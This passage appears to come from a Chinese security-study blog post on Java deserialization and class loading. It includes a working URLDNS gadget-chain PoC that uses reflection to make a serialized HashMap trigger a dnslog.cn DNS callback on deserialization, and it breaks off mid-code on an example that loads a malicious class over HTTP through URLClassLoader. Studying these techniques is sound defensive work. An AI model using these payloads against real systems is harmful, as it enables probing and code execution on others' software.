class="hljs-operator">=</span> getHostAddress(u);<br>        <span class="hljs-keyword">if</span> (addr != <span class="hljs-literal">null</span>) &#123;<br>            h += addr.hashCode();<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            <span class="hljs-type">String</span> <span class="hljs-variable">host</span> <span class="hljs-operator">=</span> u.getHost();<br>            <span class="hljs-keyword">if</span> (host != <span class="hljs-literal">null</span>)<br>                h += host.toLowerCase().hashCode();<br>        &#125;<br><br>        <span class="hljs-comment">// 生成文件部分</span><br>        <span class="hljs-type">String</span> <span class="hljs-variable">file</span> <span class="hljs-operator">=</span> u.getFile();<br>        <span class="hljs-keyword">if</span> (file != <span class="hljs-literal">null</span>)<br>            h += file.hashCode();<br><br>        <span class="hljs-comment">// 生成端口部分</span><br>        <span class="hljs-keyword">if</span> (u.getPort() == -<span class="hljs-number">1</span>)<br>            h += getDefaultPort();<br>        <span class="hljs-keyword">else</span><br>            h += u.getPort();<br><br>        <span class="hljs-comment">// 生成ref部分</span><br>        <span class="hljs-type">String</span> <span class="hljs-variable">ref</span> <span class="hljs-operator">=</span> u.getRef();<br>        <span class="hljs-keyword">if</span> (ref != <span class="hljs-literal">null</span>)<br>            h += ref.hashCode();<br><br>        <span class="hljs-keyword">return</span> h;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>查看 getHostAddress 方法的定义如下，其中 InetAddress.getByName(host) 会进行dns查询：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">synchronized</span> InetAddress <span class="hljs-title function_">getHostAddress</span><span class="hljs-params">(URL u)</span> &#123;<br>        <span class="hljs-comment">// 检查URL对象的hostAddress字段是否已经存储了主机地址，如果已经存储，则直接返回该地址</span><br>    	<span class="hljs-keyword">if</span> (u.hostAddress != <span class="hljs-literal">null</span>)<br>            <span class="hljs-keyword">return</span> u.hostAddress;<br>		<br>    	<span class="hljs-comment">// 如果hostAddress字段为空，则尝试从URL对象中获取主机名。</span><br>        <span class="hljs-type">String</span> <span class="hljs-variable">host</span> <span class="hljs-operator">=</span> u.getHost();<br>        <span class="hljs-keyword">if</span> (host == <span class="hljs-literal">null</span> || host.equals(<span class="hljs-string">&quot;&quot;</span>)) &#123;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">null</span>;<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            <span class="hljs-keyword">try</span> &#123;<br>                u.hostAddress = InetAddress.getByName(host);<span class="hljs-comment">// 发送dns请求</span><br>            &#125; <span class="hljs-keyword">catch</span> (UnknownHostException ex) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">null</span>;<br>            &#125; <span class="hljs-keyword">catch</span> (SecurityException se) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">null</span>;<br>            &#125;<br>        &#125;<br>        <span class="hljs-keyword">return</span> u.hostAddress;<br>    &#125;<br></code></pre></td></tr></table></figure>

<h6 id="Poc验证："><a href="#Poc验证：" class="headerlink" title="Poc验证："></a>Poc验证：</h6><p>以上是根据 ysoserial 中列出的 Gadget 进行的分析，接下来尝试写一个 poc 验证一下</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240425160322758.png" srcset="/img/loading.gif" lazyload alt="image-20240425160322758"></p>
<p>代码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> org.example;<br><br><span class="hljs-keyword">import</span> java.io.IOException;<br><span class="hljs-keyword">import</span> java.io.ObjectOutputStream;<br><span class="hljs-keyword">import</span> java.net.URL;<br><span class="hljs-keyword">import</span> java.nio.file.Files;<br><span class="hljs-keyword">import</span> java.nio.file.Paths;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Main</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> ClassNotFoundException, IOException, IllegalAccessException, NoSuchFieldException &#123;<br>        HashMap&lt;URL, String&gt; hashMap = <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>&lt;URL, String&gt;(); <span class="hljs-comment">// new一个HashMap对象，需要传入键值对格式，这里传递一个URL类和字符串</span><br>        <span class="hljs-type">URL</span> <span class="hljs-variable">url</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">URL</span>(<span class="hljs-string">&quot;http://2miwqz.dnslog.cn&quot;</span>); <span class="hljs-comment">// new一个URL类，内容是dnslog的</span><br>        hashMap.put(url,<span class="hljs-string">&quot;123&quot;</span>); <span class="hljs-comment">// 将URL和字符串put到hashMap里</span><br>        serialize(hashMap);<span class="hljs-comment">// 对hashMap进行序列化</span><br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">serialize</span><span class="hljs-params">(Object obj)</span> <span class="hljs-keyword">throws</span> IOException &#123;<br>        <span class="hljs-type">ObjectOutputStream</span> <span class="hljs-variable">oos</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectOutputStream</span>(Files.newOutputStream(Paths.get(<span class="hljs-string">&quot;urldns.bin&quot;</span>))); <span class="hljs-comment">//将序列化后的数据输出到urldns.bin文件中</span><br>        oos.writeObject(obj); <span class="hljs-comment">//调用writeObject方法，对传入的类进行序列化操作</span><br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>在这里发现问题，在进行序列化的时候就已经收到了dns的请求，这是因为给 hashMap 传值是调用了其 put 方法，put方法中调用了前面的 putVal 方法，之后调用 hashCode 方法，进行了dns请求</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240425160427804.png" srcset="/img/loading.gif" lazyload alt="image-20240425160427804"></p>
<p>跟一下 hashMap.put 方法，这里调用了 putVal 方法，putVal 又调用了 hash 方法，就会走到前面跟链的结果，从而请求dns：</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240425160959796.png" srcset="/img/loading.gif" lazyload alt="image-20240425160959796"></p>
<p>所以为了避免在序列化时就进行dns请求，这里可以使用反射的方式，先将 hashcode 的值设置为不是-1的值，这样就不会执行 <code>handler.hashCode()</code> 方法了，从而不进行dns请求</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240425162122720.png" srcset="/img/loading.gif" lazyload alt="image-20240425162122720"></p>
<p>关于反射的机制可以在这个链接中了解一下：<a target="_blank" rel="noopener" href="https://javasec.org/javase/Reflection/Reflection.html">https://javasec.org/javase/Reflection/Reflection.html</a></p>
<p>通过使用反射可以获取到任何类的成员方法、成员变量、构造方法等信息，还可以修改任意的类成员变量值等，这里直接利用反射修改 hashCode 的值即可</p>
<p>代码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> org.example;<br><br><span class="hljs-keyword">import</span> java.io.IOException;<br><span class="hljs-keyword">import</span> java.io.ObjectOutputStream;<br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.net.URL;<br><span class="hljs-keyword">import</span> java.nio.file.Files;<br><span class="hljs-keyword">import</span> java.nio.file.Paths;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Main</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> ClassNotFoundException, IOException, IllegalAccessException, NoSuchFieldException &#123;<br>        HashMap&lt;URL, String&gt; hashMap = <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>&lt;URL, String&gt;(); <span class="hljs-comment">// new一个HashMap对象，需要传入键值对格式，这里传递一个URL类和字符串</span><br>        <span class="hljs-type">URL</span> <span class="hljs-variable">url</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">URL</span>(<span class="hljs-string">&quot;http://s91yp7.dnslog.cn&quot;</span>); <span class="hljs-comment">// new一个URL类，内容是dnslog的</span><br>        Class&lt;? <span class="hljs-keyword">extends</span> <span class="hljs-title class_">URL</span>&gt; urlClass = url.getClass(); <span class="hljs-comment">// 通过反射得到url类</span><br>        <span class="hljs-type">Field</span> <span class="hljs-variable">hashCode</span> <span class="hljs-operator">=</span> urlClass.getDeclaredField(<span class="hljs-string">&quot;hashCode&quot;</span>); <span class="hljs-comment">// 获取hashCode值</span><br>        hashCode.setAccessible(<span class="hljs-literal">true</span>);<span class="hljs-comment">//由于hashCode是私有成员，所有这里需要设置允许访问对象的私有成员</span><br>        hashCode.set(url,<span class="hljs-number">123</span>); <span class="hljs-comment">//修改hashCode值为123</span><br>        hashMap.put(url,<span class="hljs-string">&quot;123&quot;</span>); <span class="hljs-comment">// 将URL和字符串put到hashMap里</span><br>        hashCode.set(url,-<span class="hljs-number">1</span>); <span class="hljs-comment">// 由于之前将hashCode值修改了，为了后续反序列化时执行dns请求，需要将其修改回-1</span><br>        serialize(hashMap);<span class="hljs-comment">// 对hashMap进行序列化</span><br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">serialize</span><span class="hljs-params">(Object obj)</span> <span class="hljs-keyword">throws</span> IOException &#123;<br>        <span class="hljs-type">ObjectOutputStream</span> <span class="hljs-variable">oos</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectOutputStream</span>(Files.newOutputStream(Paths.get(<span class="hljs-string">&quot;urldns.bin&quot;</span>))); <span class="hljs-comment">//将序列化后的数据输出到urldns.bin文件中</span><br>        oos.writeObject(obj); <span class="hljs-comment">//调用writeObject方法，对传入的类进行序列化操作</span><br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这样进行序列化就不会发送dns请求了</p>
<p>之后对序列化后的文件 urldns.bin 进行反序列化</p>
<p>代码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> org.example;<br><br><span class="hljs-keyword">import</span> java.io.IOException;<br><span class="hljs-keyword">import</span> java.io.ObjectInputStream;<br><span class="hljs-keyword">import</span> java.nio.file.Files;<br><span class="hljs-keyword">import</span> java.nio.file.Paths;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Unserialization</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException &#123;<br>        unserialize(<span class="hljs-string">&quot;urldns.bin&quot;</span>); <span class="hljs-comment">// 对urldns.bin进行反序列化操作</span><br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">unserialize</span><span class="hljs-params">(String Filename)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException, IOException &#123;<br>        <span class="hljs-type">ObjectInputStream</span> <span class="hljs-variable">ois</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectInputStream</span>(Files.newInputStream(Paths.get(Filename))); <span class="hljs-comment">//将urldns.bin文件输入到ois对象中</span><br>        ois.readObject();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>同时 dnslog 接收到了反序列化时的dns请求</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240426092825997.png" srcset="/img/loading.gif" lazyload alt="image-20240426092825997"></p>
<h3 id="ClassLoader（类加载机制）"><a href="#ClassLoader（类加载机制）" class="headerlink" title="ClassLoader（类加载机制）"></a>ClassLoader（类加载机制）</h3><h4 id="类加载过程"><a href="#类加载过程" class="headerlink" title="类加载过程"></a>类加载过程</h4><p>先在方法区找class信息，有的话直接调用，没有的话则使用类加载器加载到方法区（静态成员放在静态区，非静态成功放在非静态区)，静态代码块在类加载时自动执行代码，非静态的不执行；先父类后子类，先静态后非静态；静态方法和非静态方法都是被动调用，即不调用就不执行。</p>
<p>类加载的流程如下图：</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510145620304.png" srcset="/img/loading.gif" lazyload alt="image-20240510145620304"></p>
<p>其中初始化阶段是会执行代码的，使用阶段就是创建对象，也会执行代码</p>
<h4 id="构造函数和静态代码块"><a href="#构造函数和静态代码块" class="headerlink" title="构造函数和静态代码块"></a>构造函数和静态代码块</h4><p>在Person类中创建一个<strong>静态代码块</strong>(不管调用哪种静态代码，都会调用静态代码块)和<strong>构造代码块</strong>(不管调用哪种构造方法，都会调用构造代码块)</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> org.example;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Person</span> &#123;<br>    <span class="hljs-keyword">static</span> &#123; <span class="hljs-comment">//静态代码块定义</span><br>        System.out.println(<span class="hljs-string">&quot;静态代码块&quot;</span>);<br>    &#125;<br>    &#123; <span class="hljs-comment">//构造代码块定义</span><br>        System.out.println(<span class="hljs-string">&quot;构造代码块&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>当创建对象时，发现两个代码块都被输出了，由此可见在使用阶段两种代码块都调用了</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510150501986.png" srcset="/img/loading.gif" lazyload alt="image-20240510150501986"></p>
<p>接下来分析一下哪个是在初始化阶段调用的，哪个是在使用阶段调用的</p>
<p>在Person类中加上一个静态变量id，给变量赋值时发现只调用了静态代码块，说明静态代码块是在初始化阶段就执行了</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510151019135.png" srcset="/img/loading.gif" lazyload alt="image-20240510151019135"></p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510151032698.png" srcset="/img/loading.gif" lazyload alt="image-20240510151032698"></p>
<p>通过 <em>Class</em>.<em>forName</em> 动态加载Person类，发现调用了静态代码块，说明 <em>Class</em>.<em>forName</em> 加载时对类进行了初始化</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510151448849.png" srcset="/img/loading.gif" lazyload alt="image-20240510151448849"></p>
<p>也可以让类加载的时候不进行初始化，跟踪一下 <em>Class</em>.<em>forName</em> 方法：</p>
<p>代码里return了一个 <em>forName0</em> 方法</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510152118522.png" srcset="/img/loading.gif" lazyload alt="image-20240510152118522"></p>
<p>跟着看一下这个方法，发现这个方法是native定义的，是c&#x2F;c++写的，其中有四个参数，第一个是类名，第二个是判断是否进行初始化，第三个是 <em>ClassLoader</em> 是个类加载器，第四个参数不重要</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510152159996.png" srcset="/img/loading.gif" lazyload alt="image-20240510152159996"></p>
<p>在 <em>Class</em>.<em>forName</em> 中可以看到判断初始化的参数默认传的是true</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510152905852.png" srcset="/img/loading.gif" lazyload alt="image-20240510152905852"></p>
<p>可以手动让其加载类时不进行初始化，其中第三个参数由于需要传递一个类加载器，可以通过 <em>ClassLoader</em>.<em>getSystemClassLoader</em>() 方法获取一个系统类加载器</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> org.example;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Main</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> ClassNotFoundException &#123;<br><span class="hljs-comment">//        new Person();</span><br><span class="hljs-comment">//        Person.id = 1;</span><br><span class="hljs-comment">//        Class.forName(&quot;org.example.Person&quot;);</span><br>        <span class="hljs-type">ClassLoader</span> <span class="hljs-variable">classLoader</span> <span class="hljs-operator">=</span> ClassLoader.getSystemClassLoader();<br>        Class.forName(<span class="hljs-string">&quot;org.example.Person&quot;</span>,<span class="hljs-literal">false</span>,classLoader);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>执行后发现没有输出静态代码块，说明没有进行初始化</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510153459637.png" srcset="/img/loading.gif" lazyload alt="image-20240510153459637"></p>
<h4 id="双亲委派机制"><a href="#双亲委派机制" class="headerlink" title="双亲委派机制"></a>双亲委派机制</h4><p>前面代码是通过 <em>ClassLoader</em>.<em>getSystemClassLoader</em>() 方法来获取的系统类加载器，这里输出查看一下，得到结果是 AppClassLoader </p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510153907055.png" srcset="/img/loading.gif" lazyload alt="image-20240510153907055"></p>
<p>Java中提供了这四种类型的加载器：</p>
<ul>
<li>Bootstrap ClassLoader 引导类加载器，是最基本的类加载器，也就是系统类加载器，加载的是 java.lang 下的类，它是ExtClassLoader的父类加载器</li>
<li>Extention ClassLoader 扩展类加载器，用来加载ext目录下的类库的，ExtClassLoader是AppClassLoader的父类加载器</li>
<li>Application ClassLoader 系统类加载器，主要负责加载当前应用的 classpath 下的所有类，平常使用的大部分都是通过这个类加载器加载的<ul>
<li>classpath 实际上就是系统变量java.class.path的值</li>
<li><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240510155045829.png" srcset="/img/loading.gif" lazyload alt="image-20240510155045829"></li>
</ul>
</li>
<li>User ClassLoader  自定义类加载器，用户自定义的类加载器，可加载指定路径的class文件</li>
</ul>
<p>双亲委派机制，指的就是：<strong>当一个类加载器收到了类加载的请求的时候，他不会直接去加载指定的类，而是把这个请求委托给自己的父加载器去加载。只有父加载器无法加载这个类的时候，才会由当前这个加载器来负责类的加载。</strong></p>
<p>注意：<strong>双亲委派机制只是一种逻辑的指向，并不是真正的继承关系</strong></p>
<p><img src="E:/zhaozhichao/Java_Security/images/image_20240520101101.png" srcset="/img/loading.gif" lazyload alt="image_20240520101101"></p>
<h4 id="任意类加载"><a href="#任意类加载" class="headerlink" title="任意类加载"></a>任意类加载</h4><p>这里跟踪一下类加载器的底层原理，实现加载任意的类，从而实现任意类加载漏洞利用</p>
<p>跟踪前需要对jdk的 rt.jar 进行反编译一下，这样可以更清晰的看到代码逻辑，反编译流程可以看一下这个连接<code>https://blog.csdn.net/yangyangrenren/article/details/117554745</code></p>
<p>加载Person类为例</p>
<p>在类加载地方打上断点，单机调试按钮</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240515165236643.png" srcset="/img/loading.gif" lazyload alt="image-20240515165236643"></p>
<p>单机强制步入(shift+alt+f7)，走到了 ClassLoader 抽象类下的 loadClass 方法（抽象类无法实例化，需要被继承才能被使用）</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240515165251693.png" srcset="/img/loading.gif" lazyload alt="image-20240515165251693"></p>
<p>由之前分析得知，我们使用的是 AppClassLoader，所以调用的是 AppClassLoader 的 loadClass方法，这里调用了 super.<em>loadClass</em></p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240515165453793.png" srcset="/img/loading.gif" lazyload alt="image-20240515165453793"></p>
<p>继续跟进，代码又回到了 ClassLoader 类里面，在这里查询了parent加载器是否为null，结果为null的话就再往下慢慢去找.(parent加载器:请求委托给自己的父加载器去加载。只有父加载器无法加载这个类的时候，才会由当前这个加载器来负责类的加载。父类加载不了所以为null)</p>
<p><img src="E:/zhaozhichao/Java_Security/images/image-20240515165540153.png" srcset="/img/loading.gif" lazyload alt="image-20240515165540153"></p>
<p>走到 findClass 方法，会进入到URLclassloader里，这是因为Appclassloader中没有findClass方法，URLclassloader是Appclassloader类的父类，所以走到了URLclassloader</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240515165645932.png" srcset="/img/loading.gif" lazyload alt="image-20240515165645932"></p>
<p>跟一下URLclassloader的findClass方法，方法中最后会调用一个 <em><strong>defineClass</strong></em> 方法，实际上就是在这个方法里完成了类的加载</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240517091613046.png" srcset="/img/loading.gif" lazyload alt="image-20240517091613046"></p>
<p>跟一下这个 <em>defineClass</em>，代码中调用了另一个<em>defineClass</em>方法，继续跟进</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240517091727669.png" srcset="/img/loading.gif" lazyload alt="image-20240517091727669"></p>
<p>到了URLclassLoadr的父类SecureClassLoader的defineClass方法</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240517091753317.png" srcset="/img/loading.gif" lazyload alt="image-20240517091753317"></p>
<p>继续跟进，发现回到了最开始的 ClassLoader 类的defineClass方法，代码中调用了一个<em>defineClass1</em>方法，跟着看一下这个方法</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240517092158425.png" srcset="/img/loading.gif" lazyload alt="image-20240517092158425"></p>
<p>发现是三个native方法，传一个类名，传个字节码，最终就是在这里加载了<strong>字节码</strong></p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240517092223111.png" srcset="/img/loading.gif" lazyload alt="image-20240517092223111"></p>
<p>最后再一层一层的返回回去</p>
<p>从结果分析这几个类的父子关系是ClassLoader-&gt;SecureClassloader-&gt;urlclassloaer-&gt;applicationclassloaer</p>
<p>方法调用关系是loadClass-&gt;findClass-&gt;defineClass(从字节码加载类)</p>
<h6 id="通过URLclassloader加载任意类"><a href="#通过URLclassloader加载任意类" class="headerlink" title="通过URLclassloader加载任意类"></a>通过URLclassloader加载任意类</h6><p><strong>上面分析了 URLclassloader，这个类还可以通过url来加载任意类</strong></p>
<p>首先本地起一个http服务，目录下有准备好的恶意类文件</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240517142936788.png" srcset="/img/loading.gif" lazyload alt="image-20240517142936788"></p>
<p>编写代码，利用URLClassLoader 通过http来加载执行Calc.class类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> java.net.MalformedURLException;<br><span class="hljs-keyword">import</span> java.net.URL;<br><span class="hljs-keyword">import</span> java.net.URLClassLoader;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Main</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> ClassNotFoundException, InstantiationException, IllegalAccessException, MalformedURLException &#123;<br>        <span class="hljs-type">URLClassLoader</span> <span class="hljs-variable">urlClassLoader</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">URLClassLoader</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">URL</span>[]&#123;<span class="hljs-keyword">new</span> <span class="hljs-title class_">URL</span>(<span class="hljs-string">&quot;http://127.0.0.1/&quot;</span>)&#125;); <span 